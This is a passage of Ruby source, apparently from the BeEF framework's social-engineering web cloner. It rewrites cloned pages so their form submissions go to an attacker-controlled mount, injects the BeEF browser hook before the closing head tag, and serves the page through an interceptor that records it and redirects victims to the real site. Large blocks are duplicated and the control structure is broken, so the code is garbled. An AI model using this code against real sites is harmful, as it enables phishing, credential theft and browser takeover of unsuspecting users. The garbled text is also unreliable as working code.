# modify the form 'action' attribute
line_attrs.each do |attr|
if attr.include? "action=\""
print_info "Form action found: #{attr}"
break
if success
File.open("#{@cloned_pages_dir + output_mod}", 'w') do |out_file|
File.open("#{@cloned_pages_dir + output}", 'r').each do |line|
# Modify the <form> line changing the action URI to / in order to be properly intercepted by BeEF
if line.include?("<form ")
line_attrs = line.split(" ")
c = 0
cc = 0
#todo: probably doable also with map!
# modify the form 'action' attribute
line_attrs.each do |attr|
if attr.include? "action=\""
print_info "Form action found: #{attr}"
break
end
c += 1
end
c += 1
line_attrs[c] = "action=\"#{mount}\""
#todo: to be tested, needed in case like yahoo
# delete the form 'onsubmit' attribute
#line_attrs.each do |attr|
# if attr.include? "onsubmit="
# print_info "Form onsubmit event found: #{attr}"
# break
# end
# cc += 1
#end
#line_attrs[cc] = ""
mod_form = line_attrs.join(" ")
print_info "Form action value changed in order to be intercepted :-D"
out_file.print mod_form
# Add the BeEF hook
elsif line.include?("</head>") && @config.get('beef.extension.social_engineering.web_cloner.add_beef_hook')
out_file.print add_beef_hook(line)
print_info "BeEF hook added :-D"
else
out_file.print line
end
line_attrs[c] = "action=\"#{mount}\""
#todo: to be tested, needed in case like yahoo
# delete the form 'onsubmit' attribute
#line_attrs.each do |attr|
# if attr.include? "onsubmit="
# print_info "Form onsubmit event found: #{attr}"
# break
# end
# cc += 1
#end
#line_attrs[cc] = ""
mod_form = line_attrs.join(" ")
print_info "Form action value changed in order to be intercepted :-D"
out_file.print mod_form
# Add the BeEF hook
elsif line.include?("</head>") && @config.get('beef.extension.social_engineering.web_cloner.add_beef_hook')
out_file.print add_beef_hook(line)
print_info "BeEF hook added :-D"
else
out_file.print line
end
end
end
if File.size("#{@cloned_pages_dir + output}") > 0
print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]"
file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve
# Check if the original URL can be framed
frameable = is_frameable(url)
interceptor = BeEF::Extension::SocialEngineering::Interceptor
interceptor.set :redirect_to, url
interceptor.set :frameable, frameable
interceptor.set :beef_hook, @beef_hook
interceptor.set :cloned_page, get_page_content(file_path)
interceptor.set :db_entry, persist_page(url,mount)
@http_server.mount("#{mount}", interceptor.new)
print_info "Mounting cloned page on URL [#{mount}]"
@http_server.remap
success = true
else
print_error "Error cloning #{url}. Be sure that you don't have errors while retrieving the page with 'wget'."
success = false
end
end
success
if File.size("#{@cloned_pages_dir + output}") > 0
print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]"
file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve
# Check if the original URL can be framed
frameable = is_frameable(url)
interceptor = BeEF::Extension::SocialEngineering::Interceptor
interceptor.set :redirect_to, url
interceptor.set :frameable, frameable
interceptor.set :beef_hook, @beef_hook
interceptor.set :cloned_page, get_page_content(file_path)
interceptor.set :db_entry, persist_page(url,mount)
@http_server.mount("#{mount}", interceptor.new)
print_info "Mounting cloned page on URL [#{mount}]"
@http_server.remap
success = true
else
print_error "Error cloning #{url}. Be sure that you don't have errors while retrieving the page with 'wget'."
success = false
end
success
end
private